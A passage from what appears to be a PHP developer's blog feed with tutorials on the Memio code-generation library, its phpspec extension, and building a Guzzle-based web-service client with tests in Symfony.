Vendor\Project\Request for you?Vendor\Project\RequestHandler for you?Vendor\Project\RequestHandler::handle() for you?By accepting everytime, phpspec will bootstrap the following
src/Vendor/Project/Vendor/RequestHandler.php file:
<?php
namespace Vendor\Project;
class RequestHandler
{
public function handle($argument1)
{
// TODO: write logic here
}
}
In our specification, we make use of a non existing Request class, and phpspec
also bootstraped it for us in src/Vendor/Project/Vendor/Request.php:
<?php
namespace Vendor\Project;
interface Request
{
}
This is extremely usefull to kickstart our TDD cycle!
SpecGen is a phpspec extension, it makes use of Memio (the PHP code generator library) to make the above bootstraping even more awesome.
Here's how to install it:
composer require --dev memio/spec-gen:~0.1
We also need to register it as a phpspec extension by writing the following phpspec.yml file:
extensions:
- Memio\SpecGen\MemioSpecGenExtension
Its first release, v0.1 (unstable for now), improves the method generation with:
To be fair, this is exactly what already Ciaran McNulty's Typehinted Methods extension provides, so why would we choose SpecGen? Well simply because it intends to do much more:
use statementsLet's give it a try by first removing the code we boostrapped until now:
rm -rf src
In order to demonstrate more type hints, we'll add more arguments:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Vendor\Project\Request;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_arequest_and_returns_a_response(Request $request)
{
$parameters = array();
$isEnabled = true;
$this->handle($request, $parameters, $isEnabled)->shouldHaveType('Vendor\Project\Response');
}
}
We can now run the test suite to bootstrap the code:
phpspec run
This should create the following src/Vendor/Project/RequestHandler.php file:
<?php
namespace Vendor\Project;
class RequestHandler
{
public function handle(Request $request, array $argument1, $argument2)
{
}
}
Note: for now
usestatements aren't generated. In our example it doesn't matter sinceRequestis in the same namespace asRequestHandler.
Let's remove again the generated code:
rm -rf src
Now we'd like to see this multiline feature by adding many arguments to our specifiction:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_arequest_and_returns_a_response()
{
$this->myMethod(1, 2, 3, 4, 5, 6, 7, 8);
}
}
Again, we run the test suite:
phpspec run
This should bootstrap the following src/Vendor/Project/RequestHandler.php file:
<?php
namespace Vendor\Project;
class RequestHandler
{
public function myMethod(
$argument1,
$argument2,
$argument3,
$argument4,
$argument5,
$argument6,
$argument7,
$argument8
)
{
}
}
And that's it!
Memio SpecGen improves phpspec's generator by adding better named, type hinted and PSR-2 compliant method arguments.
Note that this kind of improvement has to be done in extension. They cannot be done directly in phpspec because it tries to enforce best practices, and one of them is to type hint only against interfaces. As it happens, the current extensions can also type hint against implementations, depending on how the developers write their specifications.
The next versions will bring even more exciting features, such as constructor and PHPdoc generation.
]]>Reference: see the phpspec reference article
TL;DR: Memio is a PHP code generator library,
the main repository provides integration with Twig templates, but by using the
smaller package pretty-printer on its own it is possible to be decoupled from any template engines.
Memio has finally be released in version 1.0 (stable). In this article, we'll see how the different packages are assembled in the main repository.
Memio is composed of small packages (linter, model, pretty-printer, twig-template-engine, validator),
the main repository (memio/memio) is a standard selection of those
to make their usage easier:
It can be installed using Composer:
composer require memio/memio:~1.0
It provides two services, which can be instanciated as follow:
<?php
// File: memio.php
require __DIR__.'/vendor/autoload.php';
use Memio\Memio\Config\Build;
$linter = Build::linter();
$prettyPrinter = Build::prettyPrinter();
To see how to use them, let's describe a request handler method:
// ...
use Memio\Model\Method;
use Memio\Model\Argument;
$handle = Method::make('handle')
->addArgument(Argument::make('Request', 'request'))
->addArgument(Argument::make('int', 'type')
->setDefaultValue('self::MASTER_REQUEST')
)
->addArgument(Argument::make('bool', 'catch')
->setDefaultValue('true')
)
;
Note: Each Model can be constructed using
newor the static constructormake. The last one has the advantage to allow method chaining (e.g.Method::make('doHandle')->makePrivate()).
We can lint this model:
// ...
$linter->validate($handler); // @throws Memio\Validator\Exception\InvalidModelException if the model contains syntax errors.
And we can generate the corresponding PHP code:
// ...
$generatedCode = $prettyPrinter->generateCode($handle);
We can check in our console's output the result:
// ...
echo $generatedCode;
This should print:
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = true)
{
}
Currently it is possible to describe:
It is possible to describe a method Body, but only with a string:
// ...
$handle->setBody(<<<BODY
try {
$this->requestHandler->handle($request);
} catch (\Exception $e) {
if (!$catch) {
throw $e;
}
}
BODY
);
In real life, models wouldn't be built manually as in the above examples. They would be built dynamically:
// ...
array_shift($argv); // remove binary name (php)
array_shift($argv); // remove script name (memio.php)
$methodName = array_shift($argv); // first argument = method name
$arguments = $argv; // all other arguments = argument types (e.g. `int`, `bool`, `DateTime`, etc)
$method = new Method($methodName);
$index = 1;
foreach ($arguments as $argumentType) {
$argumentName = 'argument'.$index++;
$method->addArgument(new Argument($argumentType, $argumentName));
}
echo $prettyPrinter->generatedCode($method);
Have a try by running php memio.php handle Request int bool, it should print the following:
public function handle(Request $argument1, $argument2, $argument3)
{
}
With this we can already improve phpspec generator (generate typehinted arguments, PHPdoc, etc). This is going to be the next Memio package, a phpspec extension.
The coding style can be changed by creating our custom templates. Those can be loaded as follow:
// ...
$prettyPrinter->addTemplatePath(__DIR__.'/our-custom-templates-dir');
Custom constraints can be written to check more things, for example we can ensure that arguments are always object.
Those steps, just like the rest, are heavily described in the official documentation.
Memio is a library that provides a PHP Code Generator:
Models (e.g. new Method('__construct'))Lint them to check if we introduced syntax errors (e.g. Method cannot be both abstract and final)PrettyPrinter to get the generated code (returns a string, can be displayed on the output or saved in a file, etc)You can read more about it with the following articles:
It also has an official documentation.
The next step is to create a phpspec extension to improve its code generator.
]]>TL;DR: PrettyPrinter converts a Model into its PHP code (returns a string), using Twig templates.
Until now we've seen how to build Memio Models to describe PHP code and how to validate the syntax.
It's now time to take things seriously with the newly released package: PrettyPrinter, the actual code generator.
As opposed to "fidelity printers" which are supposed to generate code according to the developer's coding style, "pretty printer" rely on their own.
If we were to open an existing PHP file with Memio and then to generate it again immediately, chances are that the code would look slightly different.
Note: Memio actually complies to PHP standards, with some extra rules.
The name "printer" is a bit misleading: one could think that the service would print the generated code in the console's output or a web page, but all it really does is to return a simple string.
Note: The terminology used is inspired by this StackOverflow answer.
Memio makes use of templates, making it easy to change the style. It defines a
TemplateEngine interface that has to be implemented, in order to comply with
webmozart's request.
For now the only package available is TwigTemplateEngine, it provides Twig templates.
Enough talk, let's code! First of all we have to create our PrettyPrinter:
<?php
require __DIR__.'/vendor/autoload.php';
$loader = new \Twig_Loader_Filesystem(\Memio\TwigTemplateEngine\Config\Locate::templates());
$twig = new \Twig_Environment($loader);
$line = new \Memio\TwigTemplateEngine\TwigExtension\Line\Line();
$line->add(new \Memio\TwigTemplateEngine\TwigExtension\Line\ContractLineStrategy());
$line->add(new \Memio\TwigTemplateEngine\TwigExtension\Line\FileLineStrategy());
$line->add(new \Memio\TwigTemplateEngine\TwigExtension\Line\MethodPhpdocLineStrategy());
$line->add(new \Memio\TwigTemplateEngine\TwigExtension\Line\ObjectLineStrategy());
$line->add(new \Memio\TwigTemplateEngine\TwigExtension\Line\StructurePhpdocLineStrategy());
$twig->addExtension(new \Memio\TwigTemplateEngine\TwigExtension\Type());
$twig->addExtension(new \Memio\TwigTemplateEngine\TwigExtension\Whitespace($line));
$templateEngine = new \Memio\TwigTemplateEngine\TwigTemplateEngine($twig);
$prettyPrinter = new \Memio\PrettyPrinter\PrettyPrinter($templateEngine);
Wow! That was quite painful to write! Thankfully the next package to be released
will make life really easier (spoiler alert: Build::prettyPrinter()).
Now let's build some models:
// ...
$myMethod = new \Memio\Model\Method('myMethod');
for ($i = 1; $i < 10; $i++) {
$myMethod->addArgument(new \Memio\Model\Argument('mixed', 'argument'.$i));
}
All it takes to generate the code is this:
// ...
$generatedCode = $prettyPrinter->generateCode($myMethod);
Let's see in the console output what it did:
// ...
echo $generatedCode;
We should get the following:
public function myMethod(
$argument1,
$argument2,
$argument3,
$argument4,
$argument5,
$argument6,
$argument7,
$argument8,
$argument9
)
{
}
Each arguments are displayed on their own line, because the inline equivalent would have been longer than 120 characters.
Memio has extra rules regarding coding standards, for example it adds an empty line between the PHP opening tag and the namespace statement.
We can get rid of this by creating our own custom template: first we copy the file.twig
template in our project:
{#- File: my_templates/file.twig -#}
<?php
{% if file.licensePhpdoc is not empty %}
{% include 'phpdoc/license_phpdoc.twig' with { 'license_phpdoc': file.licensePhpdoc } only %}
{% endif %}
namespace {{ file.namespace }};
{% include 'collection/fully_qualified_name_collection.twig' with {
'fully_qualified_name_collection': file.allFullyQualifiedNames
} only %}
{% if needs_line_after(file, 'fully_qualified_names') %}
{% endif %}
{% if file.structure is contract %}
{% include 'contract.twig' with { 'contract': file.structure } only %}
{% else %}
{% include 'object.twig' with { 'object': file.structure } only %}
{% endif %}
We've removed the line between {% endif %} and namespace {{ file.namespace }};.
In order for our custom template to be used, we'll need to add its directory path to PrettyPrinter:
// ...
$prettyPrinter->addTemplatePath(__DIR__.'/my_templates');
And we're done!
Let's check the result:
// ...
$file = \Memio\Model\File::make('src/Vendor/Project/MyClass.php')
->setStructure(new \Memio\Model\Object('Vendor\Project\MyClass'))
;
echo $prettyPrinter->generateCode($file);
This will output:
<?php
namespace Vendor\Project;
class MyClass
{
}
PrettyPrinter can convert Models into PHP code, it uses templates behind the scene so we can tweak the coding style our way. It isn't tied to any Template Engine, but we can install Memio's TwigTemplateEngine package .
]]>TL;DR: Write constraints to check models integrity. Linter constraints (e.g. syntax error) are already available.
Everyday Memio, the higly opinionated PHP code generation library, progresses toward its stable release.
In this article, we'll have a look at two packages that have been freshly extracted:
memio/validator and memio/linter.
The validator packages provides an easy way to write constraints. Let's write one to check that method arguments are never scalar.
Note: This is one of the principle in object calisthenics: wrap all primitives and string.
<?php
require __DIR__.'/vendor/autoload.php';
use Memio\Validator\Constraint;
use Memio\Validator\Violation\NoneViolation;
use Memio\Validator\Violation\SomeViolation;
class ArgumentCannotBeScalar implements Constraint
{
public function validate($model)
{
$type = $model->getType();
if (in_array($type, array('array', 'bool', 'callable', 'double', 'int', 'mixed', 'null', 'resource', 'string'), true)) {
return new SomeViolation(sprintf('Argument "%s" cannot be scalar', $model->getName()));
}
return new NoneViolation();
}
}
Note: Naming constraints after their error message allow for better reability.
The next step is to register our constraint in a validator. Since our constraint
aims Argument models, we'll register it in an ArgumentValidator:
// ...
use Memio\Validator\ModelValidator\ArgumentValidator;
$argumentValidator = new ArgumentValidator();
$argumentValidator->add(new ArgumentCannotBeScalar());
When building models, Arguments are burried in Methods, which themselves are burried in
Contracts or Objects which in turn are burried in File.
To make things easy, we'd like to simply give the top most model (e.g. File) to
a generic Validator. Its responsibility would be to go through each models and execute
the appropriate ModelValidator.
In order to do so, we have to create all ModelValidators and assemble them as follow:
// ...
use Memio\Validator\ModelValidator\CollectionValidator;
use Memio\Validator\ModelValidator\ContractValidator;
use Memio\Validator\ModelValidator\FileValidator;
use Memio\Validator\ModelValidator\MethodValidator;
use Memio\Validator\ModelValidator\ObjectValidator;
$collectionValidator = new CollectionValidator();
$methodValidator = new MethodValidator($argumentValidator, $collectionValidator);
$contractValidator = new ContractValidator($collectionValidator, $methodValidator);
$objectValidator = new ObjectValidator($collectionValidator, $methodValidator);
$fileValidator = new FileValidator($contractValidator, $objectValidator);
Finally, we need to create a validator and register our ModelValidators in it:
// ...
use Memio\Validator\Validator;
$calisthenicValidator = new Validator();
$calisthenicValidator->add($argumentValidator);
$calisthenicValidator->add($collectionValidator);
$calisthenicValidator->add($methodValidator);
$calisthenicValidator->add($contractValidator);
$calisthenicValidator->add($objectValidator);
$calisthenicValidator->add($fileValidator);
We can now validate our Models:
// ...
$calisthenicValidator->validate($file); // @throws Memio\Validator\InvalidModelException if one or more constraint fail
The InvalidModelException's message has one line per violation.
Out of the box, Memio provides a Linter which provides the following constraints:
As we've seen above, constructing and assembling constraints and validators can be quite tiresome.
That's where memio/memio, the main central repository, starts to be useful by
providing a simple way to get a ready to use linter:
<?php
require __DIR__.'/vendor/autoload.php';
use Memio\Memio\Config\Build;
$linter = Build::linter();
$linter->validate($file); // @throws Memio\Validator\InvalidModelException if one or more constraint fail
Validator allows the creation of custom constraint to ensure that the build Models are valid. Linter is a set of constraints ready to use, allowing to prevent syntax errors (e.g. a method cannot be both final and abstract).
If you'd like to find out more about Memio Validator, have a look at the documentation:
]]>TL;DR: Describe code by building models.
Memio is a highly opinionated PHP code generation library, its version 1.0.0 (stable)
is going to be released soon: currently the main package memio/memio is being
split into smaller packages.
In this article, we'll have a look at the very first package to be ready: memio/model.
Let's have a look at the following method:
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = true)
{
}
We have many things here:
handle which is:
It has the following arguments:
Request object named requesttype which defaults to self::MASTER_REQUESTcatch which defaults to trueMemio provides models that allow us to describe this method by constructing objects:
<?php
use Memio\Model\Argument;
use Memio\Model\Method;
require __DIR__.'/vendor/autoload.php';
$method = Method::make('handle')
->addArgument(Argument::make('Request', 'request'))
->addArgument(Argument::make('int', 'type')
->setDefaultValue('self::MASTER_REQUEST')
)
->addArgument(Argument::make('bool', 'catch')
->setDefaultValue('true')
)
;
Note: Static constructors are used to allow fluent interface (chaining calls). From PHP 5.6 it is possible to do the following:
(new Method('handle'))->addArgument(new Argument('Request', 'request'));
Usually models aren't built manually, they could be constructed using:
Here's a usage example. When running the test suite, phpspec generates missing methods in our code (amongst many other nice things).
If the following call is found in a test:
$this->handle($request);
And if the handle method isn't defined in the class currently tested, then phpspec
gathers the following parameters:
$methodName, which here is set to 'handle'$arguments, which here is set to array($request)Let's re-write its generator using Memio:
<?php
use Memio\Model\Argument;
use Memio\Model\Method;
require __DIR__.'/vendor/autoload.php';
function phpspec_generator($methodName, array $arguments) {
$method = new Method($methodName);
$index = 1;
foreach ($arguments as $argument) {
$type = is_object($argument) ? get_class($argument) : gettype($argument);
$argumentName = 'argument'.$index++;
$method->addArgument(new Argument($type, $argumentName));
}
return $method
}
Pretty straightforward!
Models are Memio's core, almost every memio packages will rely on them:
memio/linter will scan models to detect errors (e.g. abstract methods in a final class)memio/twig-template will use them to actually generate the corresponding codeFor now they can describe:
There are some limitations:
$toto = 42;\necho $toto;)For now, it will be sufficient to start working on exciting projects!
If you'd like to find out more about Memio Models, have a look at the documentation:
]]>TL;DR: Work in Progress: Memio, a library for PHP code generation.
Code generators write code for you, so you don't have to! There's many kinds out there:
Many frameworks provide code generators, because they can be a real time saver by automating repetitive boring tasks (e.g. bootstraping a CRUD controller). The only issue is that usually we can't customize them.
For example with GeneratorBundle, it's impossible to create REST controllers.
Some of them provide templates but don't template engines, like phpspec for example: this is a step forward but that's not enough.
Now let's have a look at code generator libraries: the main ones don't allow an easy way to customize the coding style of generated code:
Some of them do use a template engine, but you need to write a lot of code in order to use them:
Don't panic! Memio is a code generator library that uses a template engine and provide out of the box templates, generators and even validation!
Started in september 2014 under the name "Medio", it has now matured enough to be soon released in stable version (1.0.0).
Let's have a look at what's going to be achieved with it.
The phpspec typehint extension was a good playground for Memio: it allowed to test generation of a method argument by:
Once Memio is stable, it will provide its own phpspec extension that aims at:
Curious about this last bullet point? Then read on.
There are many ways to use constructors, and one of them is dependency injection: each argument is stored in a property and the class can then use them.
Note: Remember, Dependency Injection is a fancy word for passing arguments.
When doing so, we need to write a lot of boilerplate code:
Memio will automate this in its phpspec extension.
We talked about GeneratorBundle: the issue is that we can't define our own templates. Well Memio could solve this issue in a reusable way!
Usually each applications have its own style, its own requirements, etc. In short: we can't use the same code generator between projects. But if we focus on a single project, then we can start using the same code generator to boostrap many classes: endpoint/page controllers, entities, etc. The possibilities are endless!
Memio, once stable, will provide a powerful and reusable way of generating code.
What's left to do before the release of v1.0? Mainly splitting the main package
(memio/memio) into small ones (model, template-engine, validator, etc).
The main package would become a "standard edition", allowing developers to select
the features they want, for example the template engine (as requested
by webmozart).
Stay tuned!
I'd like to thank the following early contributors:
Keep up the good work!
]]>TL;DR: Happy April Fool joke!
Hello World applications are often used to showcase framework capabilities, but they usually fail to do so! This is because real world applications are never that simple.
In this series of articles, we will demonstrate how to build a real world Hello World application.
The first part will include the following standard technologies:
In the second part, we'll take things to the advanced level:
In the conlusion we'll explore Docker, Go Martini (for faster GET endpoints), Python beautiful soup (for web crawling) and NodeJs (to monitor our queues).
Of course we're going to use full stack BDD all along!
Get ready for the best "Hello World" application you've ever seen!
This was my April Fool joke, no let's get serious and build what I think is the best Hello World application:
<?php
echo 'Hello world';
Note that there's no symfony, no RabbitMQ, no nothing involved. That's because a Hello World application doesn't require anything else, those tools were design to solve issues that we don't have here.
If you're concerned about our Hello World application's performance, well you shouldn't be. First of all, it's a Hello World application... As far as I'm concerned it prints pretty much instantly this way.
Second of all, you shouldn't worry about performance when building an application. This is something you should start worrying only when you have performance issues. The best thing you could do, is build the application in a way that will allow you to change it afterwards, if the need comes (and it usually will: requirements are changing by nature).
I hope you enjoyed it :) .
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the seventh article of the series on managing Web Services in a Symfony environment. Have a look at the six first ones:
You can check the code in the following repository.
In the previous article, we've created a Guzzle RequestHandler: we are now able to make remote calls using a third party library, but without the cost of coupling ourselves to it. If Guzzle 6 is released we'll have to change only one class, instead of everywhere in our application.
In this article, we'll create the actual remote calls.
The web service we want to call requires us to authenticate. Those credentials shouldn't be hardcoded, we'll create new parameters for them (same goes for the URL):
# File: app/config/parameters.yml.dist
ws_url: http://example.com
ws_username: username
ws_password: ~
We can then set those values in the actual parameter file:
# File: app/config/parameters.yml
ws_url: "http://ws.local/app_dev.php"
ws_username: spanish_inquisition
ws_password: "NobodyExpectsIt!"
Note that because our password contains a character which is reserved in YAML (!),
we need to put the value between double quotes (same goes for % and @).
Let's commit this:
git add -A
git commit -m 'Added credentials configuration'
We can create a Gateway specialized in calling the profile web service:
./bin/phpspec describe 'AppBundle\Profile\ProfileGateway'
Usually we categorize our Symfony applications by Pattern: we'd create a Gateway
directory with all the Gateway service. However this can become quite cubersome
when the application grows, services are usually linked to a model meaning that
we'd have to jump from the Model (or Entity) directory to the Gateway one,
then go to the Factory directory, etc...
Here we've chosen an alternative: group services by model. All Profile services
can be found in the same directory.
Let's write the Gateway's specification:
<?php
// File: spec/AppBundle/Profile/ProfileGatewaySpec.php
namespace spec\AppBundle\Profile;
use AppBundle\RequestHandler\RequestHandler;
use AppBundle\RequestHandler\Response;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class ProfileGatewaySpec extends ObjectBehavior
{
const URL = 'http://example.com';
const USERNAME = 'spanish inquisition';
const PASSWORD = 'nobody expects it';
const ID = 42;
const NAME = 'Arthur';
function let(RequestHandler $requestHandler)
{
$this->beConstructedWith($requestHandler, self::URL, self::USERNAME, self::PASSWORD);
}
function it_creates_profiles(RequestHandler $requestHandler, Response $response)
{
$profile = array(
'id' => self::ID,
'name' => self::NAME,
);
$request = Argument::type('AppBundle\RequestHandler\Request');
$requestHandler->handle($request)->willReturn($response);
$response->getBody()->willReturn($profile);
$this->create(self::NAME)->shouldBe($profile);
}
}
We can now generate the code's skeleton:
./bin/phpspec run
It constructs a Request object, gives it to RequestHandler and then returns the
Response's body:
<?php
// File: src/AppBundle/Profile/ProfileGateway.php
namespace AppBundle\Profile;
use AppBundle\RequestHandler\Request;
use AppBundle\RequestHandler\RequestHandler;
class ProfileGateway
{
private $requestHandler;
private $url;
private $username;
private $password;
public function __construct(RequestHandler $requestHandler, $url, $username, $password)
{
$this->requestHandler = $requestHandler;
$this->username = $username;
$this->password = $password;
}
public function create($name)
{
$request = new Request('POST', $this->url.'/api/v1/profiles');
$request->setHeader('Authorization', 'Basic '.base64_encode($this->username.':'.$this->password));
$request->setHeader('Content-Type', 'application/json');
$request->setBody(json_encode(array('name' => $name)));
$response = $this->requestHandler->handle($request);
return $response->getBody();
}
}
Note: Managing URLs can become quite tricky when the number of routes grows. Sometimes we'll want HTTPS, sometimes HTTP. Sometimes we'll want the first version of the API, sometimes the pre production one. And what should we do when we'll need query parameters?
Usually I don't bother with those until the need is actually there, then I create a
UrlGeneratorwhich works a bit like Symfony's one and relies on a configuration array.
Let's check our tests:
./bin/phpspec run
All green!
git add -A
git commit -m 'Created ProfileGateway'
Our application happens to be a Command Line Interface (CLI). We want to write a command to create profiles, and as usual we'll begin with a test:
<?php
// File: tests/Command/CreateProfileCommandTest.php
namespace AppBundle\Tests\Command;
use PHPUnit_Framework_TestCase;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Output\NullOutput;
use Symfony\Component\Console\Input\ArrayInput;
class CreateProfileCommandTest extends PHPUnit_Framework_TestCase
{
private $app;
private $output;
protected function setUp()
{
$kernel = new \AppKernel('test', false);
$this->app = new Application($kernel);
$this->app->setAutoExit(false);
$this->output = new NullOutput();
}
public function testItRunsSuccessfully()
{
$input = new ArrayInput(array(
'commandName' => 'app:profile:create',
'name' => 'Igor',
));
$exitCode = $this->app->run($input, $this->output);
$this->assertSame(0, $exitCode);
}
}
Let's make this test pass:
<?php
// File: src/AppBundle/Command/CreateProfileCommand.php
namespace AppBundle\Command;
use Symfony\Bundle\FrameworkBundle\Command\ContainerAwareCommand;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class CreateProfileCommand extends ContainerAwareCommand
{
protected function configure()
{
$this->setName('app:profile:create');
$this->setDescription('Create a new profile');
$this->addArgument('name', InputArgument::REQUIRED);
}
protected function execute(InputInterface $input, OutputInterface $output)
{
$profileGateway = $this->getContainer()->get('app.profile_gateway');
$profile = $profileGateway->create($input->getArgument('name'));
$output->writeln(sprintf('Profile #%s "%s" created', $profile['id'], $profile['name']));
}
}
We'll need to define ProfileGateway as a service:
# File: app/config/services.yml
imports:
- { resource: services/request_handler.yml }
services:
app.profile_gateway:
class: AppBundle\Profile\ProfileGateway
arguments:
- "@app.request_handler"
- "%ws_url%"
- "%ws_username%"
- "%ws_password%"
By having a look ProfileGateway we can spot a mistake, the initialization or URL
is missing from the constructor:
<?php
// File: src/AppBundle/Profile/ProfileGateway.php
public function __construct(RequestHandler $requestHandler, $url, $username, $password)
{
$this->requestHandler = $requestHandler;
$this->username = $username;
$this->password = $password;
$this->url = $url;
}
Another mistake lies in JsonResponseListener, each Guzzle header is an array:
<?php
// File: src/AppBundle/RequestHandler/Listener/JsonResponseListener.php
$contentType = $response->getHeader('Content-Type');
if (false === strpos($contentType[0], 'application/json')) {
return;
}
With these fixes, the test should pass:
phpunit -c app
Note: if we get a
You have requested a non-existent service "app.profile_gateway"error, we might need to clear the cache for test environment:php app/console cache:clear --env=test.Note: if we get a Guzzle exception, we need to check that the previous application installed ("ws.local"), and that its database is created:
cd ../ws php app/console doctrine:database:create php app/console doctrine:schema:create cd ../cs
We can now save our work:
git add -A
git commit -m 'Created CreateProfileCommand'
We have now an application that consumes a web service. We have decoupled it from third party libraries using RequestHandler and isolated the endpoint logic in a Gateway class.
There's a lot to say about the test we wrote: it makes a network call which is slow, unreliable and it isn't immutable. If we try to run again our test, it will fail! To fix this we have many possibilities:
At this point it depends on how confident we are in the web services and what we want to test.
We should also write more test on edge cases: what happens with the wrong credentials? What happens if the endpoints cannot be reached (request timeout, connection timeout, etc)? What happens when we try to create a profile which already exists?
As it happens, this is also the conclusion of this series on managing Web Services in a Symfony environment. There's a lot more to say for example about caching remote resources in a local database, about self discovering APIs and about micro services, but I feel those should each have their own series of article :) .
]]>Reference: see the phpspec reference article
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the sixth article of the series on managing Web Services in a Symfony environment. Have a look at the five first ones:
You can check the code in the following repository.
In the previous article, we've bootstrapped an application with a RequestHandler, allowing us to be decoupled from the third part library we'll choose to request remote endpoints.
In this article, we'll create a Guzzle 5 implementation.
As usual, we first describe the class we want to create:
./bin/phpspec describe 'AppBundle\RequestHandler\Middleware\GuzzleRequestHandler'
Our Guzzle implementation will translate our Request into a guzzle one, and a
guzzle response into our Response:
<?php
// spec/AppBundle/RequestHandler/Middleware/GuzzleRequestHandlerSpec.php
namespace spec\AppBundle\RequestHandler\Middleware;
use AppBundle\RequestHandler\Request;
use GuzzleHttp\ClientInterface;
use GuzzleHttp\Message\RequestInterface;
use GuzzleHttp\Message\ResponseInterface;
use GuzzleHttp\Stream\StreamInterface;
use PhpSpec\ObjectBehavior;
class GuzzleRequestHandlerSpec extends ObjectBehavior
{
const VERB = 'POST';
const URI = '/api/v1/profiles';
const HEADER_NAME = 'Content-Type';
const HEADER_VALUE = 'application/json';
const BODY = '{"username":"King Arthur"}';
function let(ClientInterface $client)
{
$this->beConstructedWith($client);
}
function it_is_a_request_handler()
{
$this->shouldImplement('AppBundle\RequestHandler\RequestHandler');
}
function it_uses_guzzle_to_do_the_actual_request(
ClientInterface $client,
RequestInterface $guzzleRequest,
ResponseInterface $guzzleResponse,
StreamInterface $stream
)
{
$request = new Request(self::VERB, self::URI);
$request->setHeader(self::HEADER_NAME, self::HEADER_VALUE);
$request->setBody(self::BODY);
$client->createRequest(self::VERB, self::URI, array(
'headers' => array(self::HEADER_NAME => self::HEADER_VALUE),
'body' => self::BODY,
))->willReturn($guzzleRequest);
$client->send($guzzleRequest)->willReturn($guzzleResponse);
$guzzleResponse->getStatusCode()->willReturn(201);
$guzzleResponse->getHeaders()->willReturn(array('Content-Type' => 'application/json'));
$guzzleResponse->getBody()->willReturn($stream);
$stream->__toString()->willReturn('{"id":42,"username":"King Arthur"}');
$this->handle($request)->shouldHaveType('AppBundle\RequestHandler\Response');
}
}
Time to boostrap this implementation:
./bin/phpspec run
And to actually write it:
<?php
// File: src/AppBundle/RequestHandler/Middleware/GuzzleRequestHandler.php
namespace AppBundle\RequestHandler\Middleware;
use AppBundle\RequestHandler\Request;
use AppBundle\RequestHandler\RequestHandler;
use AppBundle\RequestHandler\Response;
use GuzzleHttp\ClientInterface;
use GuzzleHttp\Message\RequestInterface;
use GuzzleHttp\Message\ResponseInterface;
use GuzzleHttp\Stream\StreamInterface;
class GuzzleRequestHandler implements RequestHandler
{
private $client;
public function __construct(ClientInterface $client)
{
$this->client = $client;
}
public function handle(Request $request)
{
$guzzleRequest = $this->client->createRequest($request->getVerb(), $request->getUri(), array(
'headers' => $request->getHeaders(),
'body' => $request->getBody(),
));
$guzzleResponse = $this->client->send($guzzleRequest);
$response = new Response($guzzleResponse->getStatusCode());
$response->setHeaders($guzzleResponse->getHeaders());
$response->setBody($guzzleResponse->getBody()->__toString());
return $response;
}
}
Let's check it:
./bin/phpspec run
Brilliant!
git add -A
git commit -m 'Created GuzzleRequestHandler'
In the future we'd like to be able to hook in the RequestHandler's workflow,
for example if the Response's body is in JSON, convert it into an array.
This kind of thing can be done by sending events, in our case when a Response is received:
<?php
// File: src/AppBundle/RequestHandler/ReceivedResponse.php
namespace AppBundle\RequestHandler\Event;
use AppBundle\RequestHandler\Response;
use Symfony\Component\EventDispatcher\Event;
class ReceivedResponse extends Event
{
private $response;
public function __construct(Response $response)
{
$this->response = $response;
}
public function getResponse()
{
return $this->response;
}
}
Note: This is a simple Data Transfer Object (DTO), it doesn't contain any logic and never will. This means that we don't have to write any tests for it.
We could add an EventDispatcher in GuzzleRequestHandler, or we could create
a middleware: a RequestHandler that dispatches events and then calls another RequestHandler
(e.g. GuzzleRequestHandler):
./bin/phpspec describe 'AppBundle\RequestHandler\Middleware\EventRequestHandler'
This way if we want to throw away GuzzleRequestHandler and replace it with something
else, we don't have to write again the dispatching code. Here's the specification:
<?php
// File: spec/AppBundle/RequestHandler/Middleware/EventRequestHandlerSpec.php
namespace spec\AppBundle\RequestHandler\Middleware;
use AppBundle\RequestHandler\Request;
use AppBundle\RequestHandler\RequestHandler;
use AppBundle\RequestHandler\Response;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
use Symfony\Component\EventDispatcher\EventDispatcherInterface;
class EventRequestHandlerSpec extends ObjectBehavior
{
function let(EventDispatcherInterface $eventDispatcher, RequestHandler $requestHandler)
{
$this->beConstructedWith($eventDispatcher, $requestHandler);
}
function it_is_a_request_handler()
{
$this->shouldImplement('AppBundle\RequestHandler\RequestHandler');
}
function it_dispatches_events(
EventDispatcherInterface $eventDispatcher,
Request $request,
RequestHandler $requestHandler,
Response $response
)
{
$requestHandler->handle($request)->willReturn($response);
$receivedResponse = Argument::type('AppBundle\RequestHandler\Event\ReceivedResponse');
$eventDispatcher->dispatch('request_handler.received_response', $receivedResponse)->shouldBeCalled();
$this->handle($request)->shouldBe($response);
}
}
Note: We could improve this middleware by dispatching an event before giving the request to the RequestHandler. We could also catch exceptions coming from the RequestHandler and dispatch an event.
Time to bootstrap the code:
./bin/phpspec run
And to make the test pass:
<?php
// File: src/AppBundle/RequestHandler/Middleware/EventRequestHandler.php
namespace AppBundle\RequestHandler\Middleware;
use AppBundle\RequestHandler\Event\ReceivedResponse;
use AppBundle\RequestHandler\Request;
use AppBundle\RequestHandler\RequestHandler;
use Symfony\Component\EventDispatcher\EventDispatcherInterface;
class EventRequestHandler implements RequestHandler
{
private $eventDispatcher;
private $requestHandler;
public function __construct(EventDispatcherInterface $eventDispatcher, RequestHandler $requestHandler)
{
$this->eventDispatcher = $eventDispatcher;
$this->requestHandler = $requestHandler;
}
public function handle(Request $request)
{
$response = $this->requestHandler->handle($request);
$this->eventDispatcher->dispatch('request_handler.received_response', new ReceivedResponse($response));
return $response;
}
}
Did we succeed?
./bin/phpspec run
Yes, we did:
git add -A
git commit -m 'Created EventRequestHandler'
When a Response contains a JSON body, we need to:
With this in mind, we can describe the listerner:
./bin/phpspec describe 'AppBundle\RequestHandler\Listener\JsonResponseListener'
Now we can write the specification:
<?php
